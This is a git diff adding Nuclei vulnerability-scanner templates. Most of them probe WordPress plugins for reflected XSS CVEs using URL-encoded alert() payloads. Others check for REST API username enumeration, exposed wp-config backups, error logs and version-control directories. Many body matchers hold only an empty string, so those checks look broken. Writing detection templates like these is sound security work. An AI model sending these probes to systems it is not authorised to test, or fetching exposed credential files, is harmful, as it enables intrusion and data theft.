diff --git a/CVE-2011-4618.yaml b/CVE-2011-4618.yaml new file mode 100644 index 0000000..6593682 --- /dev/null +++ b/CVE-2011-4618.yaml @@ -0,0 +1,29 @@ +id: CVE-2011-4618 + +info: + name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4618 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/CVE-2011-4624.yaml b/CVE-2011-4624.yaml new file mode 100644 index 0000000..5ad804b --- /dev/null +++ b/CVE-2011-4624.yaml @@ -0,0 +1,29 @@ +id: CVE-2011-4624 + +info: + name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/CVE-2011-4926.yaml b/CVE-2011-4926.yaml new file mode 100644 index 0000000..bc278b7 --- /dev/null +++ b/CVE-2011-4926.yaml @@ -0,0 +1,29 @@ +id: CVE-2011-4926 + +info: + name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/CVE-2011-5107.yaml b/CVE-2011-5107.yaml new file mode 100644 index 0000000..d62a889 --- /dev/null +++ b/CVE-2011-5107.yaml @@ -0,0 +1,29 @@ +id: CVE-2011-5107 + +info: + name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/CVE-2011-5179.yaml b/CVE-2011-5179.yaml new file mode 100644 index 0000000..ba0bd6e --- /dev/null +++ b/CVE-2011-5179.yaml @@ -0,0 +1,29 @@ +id: CVE-2011-5179 + +info: + name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/CVE-2011-5181.yaml b/CVE-2011-5181.yaml new file mode 100644 index 0000000..1ee7cb8 --- /dev/null +++ b/CVE-2011-5181.yaml @@ -0,0 +1,29 @@ +id: CVE-2011-5181 + +info: + name: ClickDesk Live Support - Live Chat 2.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/CVE-2011-5265.yaml b/CVE-2011-5265.yaml new file mode 100644 index 0000000..109499f --- /dev/null +++ b/CVE-2011-5265.yaml @@ -0,0 +1,29 @@ +id: CVE-2011-5265 + +info: + name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/CVE-2012-0901.yaml b/CVE-2012-0901.yaml new file mode 100644 index 0000000..6f20b82 --- /dev/null +++ b/CVE-2012-0901.yaml @@ -0,0 +1,29 @@ +id: CVE-2012-0901 + +info: + name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/CVE-2012-2371.yaml b/CVE-2012-2371.yaml new file mode 100644 index 0000000..e9bf01a --- /dev/null +++ b/CVE-2012-2371.yaml @@ -0,0 +1,29 @@ +id: CVE-2012-2371 + +info: + name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-2371 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%22%3E%3Cimg%2Fsrc%3Dx%20onerror%3Dalert%28123%29%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/CVE-2012-4242.yaml b/CVE-2012-4242.yaml new file mode 100644 index 0000000..791034e --- /dev/null +++ b/CVE-2012-4242.yaml @@ -0,0 +1,29 @@ +id: CVE-2012-4242 + +info: + name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/?page_id=2&%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2012-5913.yaml b/CVE-2012-5913.yaml new file mode 100644 index 0000000..23512f1 --- /dev/null +++ b/CVE-2012-5913.yaml @@ -0,0 +1,29 @@ +id: CVE-2012-5913 + +info: + name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-5913 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3CScrIpT%3Ealert%28123%29%3C%2FScrIpT%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/CVE-2013-2287.yaml b/CVE-2013-2287.yaml new file mode 100644 index 0000000..33a0b55 --- /dev/null +++ b/CVE-2013-2287.yaml @@ -0,0 +1,29 @@ +id: CVE-2013-2287 + +info: + name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287 + tags: cve,cve2013,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2013-3526.yaml b/CVE-2013-3526.yaml new file mode 100644 index 0000000..b081219 --- /dev/null +++ b/CVE-2013-3526.yaml @@ -0,0 +1,29 @@ +id: CVE-2013-3526 + +info: + name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526 + tags: cve,cve2013,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2014-9094.yaml b/CVE-2014-9094.yaml new file mode 100644 index 0000000..81ae8ce --- /dev/null +++ b/CVE-2014-9094.yaml @@ -0,0 +1,29 @@ +id: CVE-2014-9094 + +info: + name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 + tags: cve,2014,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2017-5487.yaml b/CVE-2017-5487.yaml new file mode 100644 index 0000000..8668479 --- /dev/null +++ b/CVE-2017-5487.yaml @@ -0,0 +1,35 @@ +id: CVE-2017-5487 + +info: + name: WordPress Core < 4.7.1 - Username Enumeration + author: Manas_Harsh,daffainfo,geeknik + severity: info + description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request. + tags: cve,cve2017,wordpress + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2017-5487 + - https://www.exploit-db.com/exploits/41497 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-json/wp/v2/users/" + - "{{BaseURL}}/?rest_route=/wp/v2/users/" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 + + - type: word + words: + - '"id":' + - '"name":' + - '"avatar_urls":' + condition: and diff --git a/CVE-2019-14470.yaml b/CVE-2019-14470.yaml new file mode 100644 index 0000000..291551f --- /dev/null +++ b/CVE-2019-14470.yaml @@ -0,0 +1,31 @@ +id: CVE-2019-14470 + +info: + name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/9815 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470 + tags: cve,cve2019,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2019-15889.yaml b/CVE-2019-15889.yaml new file mode 100644 index 0000000..0f46219 --- /dev/null +++ b/CVE-2019-15889.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-15889 + +info: + name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889 + tags: cve,cve2019,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2020-29395.yaml b/CVE-2020-29395.yaml new file mode 100644 index 0000000..2de1016 --- /dev/null +++ b/CVE-2020-29395.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-29395 + +info: + name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: | + - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS + - https://nvd.nist.gov/vuln/detail/CVE-2020-29395 + tags: cve,cve2020,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/README.md b/README.md index 1704c20..33f5a1f 100644 --- a/README.md +++ b/README.md @@ -1,3 +1,2 @@ -### -Binded these templates here from so many repos as One! -Great Love to the guys who made it! +# my-nuclei-templates +Some contributions in the nuclei-templates repository diff --git a/error-logs.yaml b/error-logs.yaml new file mode 100644 index 0000000..fef1228 --- /dev/null +++ b/error-logs.yaml @@ -0,0 +1,57 @@ +id: error-logs +info: + name: common error log files + author: geeknik,daffainfo + severity: low + tags: logs,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/routes/error_log" + - "{{BaseURL}}/config/error_log" + - "{{BaseURL}}/error_log" + - "{{BaseURL}}/errors_log" + - "{{BaseURL}}/logs/error.log" + - "{{BaseURL}}/logs/errors.log" + - "{{BaseURL}}/log/error.log" + - "{{BaseURL}}/log/errors.log" + - "{{BaseURL}}/errors/errors.log" + - "{{BaseURL}}/error/error.log" + - "{{BaseURL}}/errors.log" + - "{{BaseURL}}/error.log" + - "{{BaseURL}}/error.txt" + - "{{BaseURL}}/errors.txt" + - "{{BaseURL}}/admin/logs/error.log" + - "{{BaseURL}}/admin/logs/errors.log" + - "{{BaseURL}}/admin/log/error.log" + - "{{BaseURL}}/admin/error.log" + - "{{BaseURL}}/admin/errors.log" + - "{{BaseURL}}/{{Hostname}}/error.log" + - "{{BaseURL}}/{{Hostname}}/errors.log" + - "{{BaseURL}}/MyErrors.log" + - "{{BaseURL}}/log.txt" + - "{{BaseURL}}/logs.txt" + - "{{BaseURL}}/log.log" + - "{{BaseURL}}/application/logs/application.log" + - "{{BaseURL}}/application/logs/default.log" + + matchers-condition: and + matchers: + - type: word + words: + - "Segmentation Fault" + - "coredump" + - "script headers" + - "Broken pipe" + - "Array" + condition: or + + - type: word + words: + - text/plain + part: header + + - type: status + status: + - 200 diff --git a/exposed-bitkeeper.yaml b/exposed-bitkeeper.yaml new file mode 100644 index 0000000..dded588 --- /dev/null +++ b/exposed-bitkeeper.yaml @@ -0,0 +1,27 @@ +id: exposed-bitkeeper + +info: + name: Exposed BitKeeper Directory + author: daffainfo + severity: low + reference: https://www.bitkeeper.org/man/config-etc.html + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/BitKeeper/etc/config" + + matchers-condition: and + matchers: + - type: word + words: + - "BitKeeper configuration" + - "logging" + - "email" + - "description" + condition: and + + - type: status + status: + - 200 diff --git a/exposed-bzr.yaml b/exposed-bzr.yaml new file mode 100644 index 0000000..c90b345 --- /dev/null +++ b/exposed-bzr.yaml @@ -0,0 +1,30 @@ +id: exposed-bzr + +info: + name: Exposed BZR Directory + author: daffainfo + severity: low + reference: http://doc.bazaar.canonical.com/beta/en/user-reference/configuration-help.html + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/.bzr/branch/branch.conf" + + matchers-condition: and + matchers: + - type: word + words: + - "parent_location" + - "push_location" + condition: or + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/plain" \ No newline at end of file diff --git a/exposed-darcs.yaml b/exposed-darcs.yaml new file mode 100644 index 0000000..002d61e --- /dev/null +++ b/exposed-darcs.yaml @@ -0,0 +1,23 @@ +id: exposed-darcs + +info: + name: Exposed Darcs Config + author: daffainfo + severity: low + reference: http://darcs.net/Using/Configuration#sources + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/_darcs/prefs/binaries" + + matchers-condition: and + matchers: + - type: word + words: + - "Binary file regexps" + + - type: status + status: + - 200 diff --git a/exposed-hg.yaml b/exposed-hg.yaml new file mode 100644 index 0000000..62ba7da --- /dev/null +++ b/exposed-hg.yaml @@ -0,0 +1,24 @@ +id: exposed-hg + +info: + name: Exposed HG Directory + author: daffainfo + severity: low + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/.hg/hgrc" + + matchers-condition: and + matchers: + - type: word + words: + - "[paths]" + - "default" + condition: and + + - type: status + status: + - 200 diff --git a/wordpress-accessible-wpconfig.yaml b/wordpress-accessible-wpconfig.yaml new file mode 100644 index 0000000..5347bbc --- /dev/null +++ b/wordpress-accessible-wpconfig.yaml @@ -0,0 +1,39 @@ +id: wordpress-accessible-wpconfig +info: + name: WordPress accessible wp-config + author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo + severity: high + tags: wordpress,backups + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-config.php' + - '{{BaseURL}}/.wp-config.php.swp' + - '{{BaseURL}}/wp-config-sample.php' + - '{{BaseURL}}/wp-config.inc' + - '{{BaseURL}}/wp-config.old' + - '{{BaseURL}}/wp-config.txt' + - '{{BaseURL}}/wp-config.php.txt' + - '{{BaseURL}}/wp-config.php.bak' + - '{{BaseURL}}/wp-config.php.old' + - '{{BaseURL}}/wp-config.php.dist' + - '{{BaseURL}}/wp-config.php.inc' + - '{{BaseURL}}/wp-config.php.swp' + - '{{BaseURL}}/wp-config.php.html' + - '{{BaseURL}}/wp-config-backup.txt' + - '{{BaseURL}}/wp-config.php.save' + - '{{BaseURL}}/wp-config.php~' + - '{{BaseURL}}/wp-config.php.orig' + - '{{BaseURL}}/wp-config.php.original' + - '{{BaseURL}}/_wpeprivate/config.json' + matchers-condition: and + matchers: + - type: word + words: + - DB_NAME + - WPENGINE_ACCOUNT + part: body + - type: status + status: + - 200 diff --git a/wp-ambience-xss.yaml b/wp-ambience-xss.yaml new file mode 100644 index 0000000..84fb6e9 --- /dev/null +++ b/wp-ambience-xss.yaml @@ -0,0 +1,29 @@ +id: wp-ambience-xss + +info: + name: WordPress Theme Ambience - 'src' Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.exploit-db.com/exploits/38568 + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/wp-church-admin-xss.yaml b/wp-church-admin-xss.yaml new file mode 100644 index 0000000..1b5fa99 --- /dev/null +++ b/wp-church-admin-xss.yaml @@ -0,0 +1,29 @@ +id: wp-church-admin-xss + +info: + name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.securityfocus.com/bid/54329/info + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28'{{randstr}}'%29%3C/script%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/wp-finder-xss.yaml b/wp-finder-xss.yaml new file mode 100644 index 0000000..c2141ac --- /dev/null +++ b/wp-finder-xss.yaml @@ -0,0 +1,29 @@ +id: wp-finder-xss + +info: + name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.securityfocus.com/bid/55217/info + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(123);%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/wp-knews-xss.yaml b/wp-knews-xss.yaml new file mode 100644 index 0000000..198ba8e --- /dev/null +++ b/wp-knews-xss.yaml @@ -0,0 +1,29 @@ +id: wp-knews-xss + +info: + name: WordPress Plugin Knews Multilingual Newsletters - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.securityfocus.com/bid/54330/info + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E ' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/wp-phpfreechat-xss.yaml b/wp-phpfreechat-xss.yaml new file mode 100644 index 0000000..986f908 --- /dev/null +++ b/wp-phpfreechat-xss.yaml @@ -0,0 +1,29 @@ +id: wp-phpfreechat-xss + +info: + name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.securityfocus.com/bid/54332/info + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/wp-securimage-xss.yaml b/wp-securimage-xss.yaml new file mode 100644 index 0000000..a7d4a9d --- /dev/null +++ b/wp-securimage-xss.yaml @@ -0,0 +1,29 @@ +id: wp-securimage-xss + +info: + name: WordPress Plugin Securimage-WP - 'siwp_test.php' Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.securityfocus.com/bid/59816/info + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/wp-socialfit-xss.yaml b/wp-socialfit-xss.yaml new file mode 100644 index 0000000..50082d8 --- /dev/null +++ b/wp-socialfit-xss.yaml @@ -0,0 +1,29 @@ +id: wp-socialfit-xss + +info: + name: WordPress Plugin SocialFit - 'msg' Cross-Site Scripting + author: daffainfo + severity: medium + description: | + SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + reference: | + - https://www.exploit-db.com/exploits/37481 + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%281%29%3C/script%3E' + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200